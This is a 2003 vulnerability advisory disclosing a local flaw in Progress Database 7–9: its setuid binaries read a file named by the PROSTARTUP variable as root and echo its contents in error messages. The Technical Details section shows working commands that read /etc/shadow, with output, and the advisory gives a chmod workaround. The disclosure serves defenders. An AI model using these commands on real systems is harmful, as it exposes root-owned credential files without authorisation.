SRT2003-04-02-1735 - Progress PROSTARTUP root owned file read

[KF <dotslash () snosoft com>]

This data can be found at http://www.secnetops.biz/research

-KF


Secure Network Operations, Inc.           http://www.secnetops.com
Strategic Reconnaissance Team               research () secnetops com
Team Lead Contact                                 kf () secnetops com


Our Mission:
************************************************************************
Secure Network Operations offers expertise in Networking, Intrusion 
Detection Systems (IDS), Software Security Validation, and 
Corporate/Private Network Security. Our mission is to facilitate a 
secure and reliable Internet and inter-enterprise communications 
infrastructure through the products and services we offer. 


Quick Summary:
************************************************************************
Advisory Number         : SRT2003-04-02-1735
Product                 : Progress Database 
Version                 : Versions 7 to 9 
Vendor                  : progress.com
Class                   : local
Criticality             : Medium to Low
Operating System(s)     : Linux, SunOS, SCO, TRU64, *nix


High Level Explination
************************************************************************
High Level Description  : Error messages can provide root owned data
What to do              : chmod -s all suid binaries in /usr/dlc


Technical Details
************************************************************************
Proof Of Concept Status : No PoC is needed. 
Low Level Description   : 

The Progress Database reads configuration files as the root user. No
checks are made to verify that the user running thr program has the 
permission to read the configuration file. A user can simply specify 
a root owned file and cause an error message to be generated to view 
the file contents. Most versions beyond v6 appear to be affected. 

An example variable that can be abused is the PROSTARTUP variable.

bash-2.03$ cat /etc/shadow
cat: cannot open /etc/shadow: Permission denied (error 13)

bash-2.03$ export PROSTARTUP=/etc/shadow
bash-2.03$ export PROMSGS=/path/to/promsgs

bash-2.03$ /u/dlc7/bin/_mprosrv
17:37:28 SERVER: ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc8/bin/_mprosrv
17:37:20 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

bash-2.03$ /u/dlc9/bin/_mprosrv
17:37:08 SERVER   : ** Could not recognize argument: daemon:*::0:0. (301)

Luckily on the machine I chose to exploit the line that was read from the 
shadow file did not have an encrypted hash. This however is not always 
the case. 

Patch or Workaround     : chmod -s all suid binaries in the $DLC folder
Vendor Status   : vendor has been notified and is working on a fix
Bugtraq URL     : to be assigned 

------------------------------------------------------------------------
This advisory was released by Secure Network Operations,Inc. as a matter
of notification to help administrators protect their networks against
the described vulnerability. Exploit source code is no longer released
in our advisories. Contact research () secnetops com for information on how
to obtain exploit information.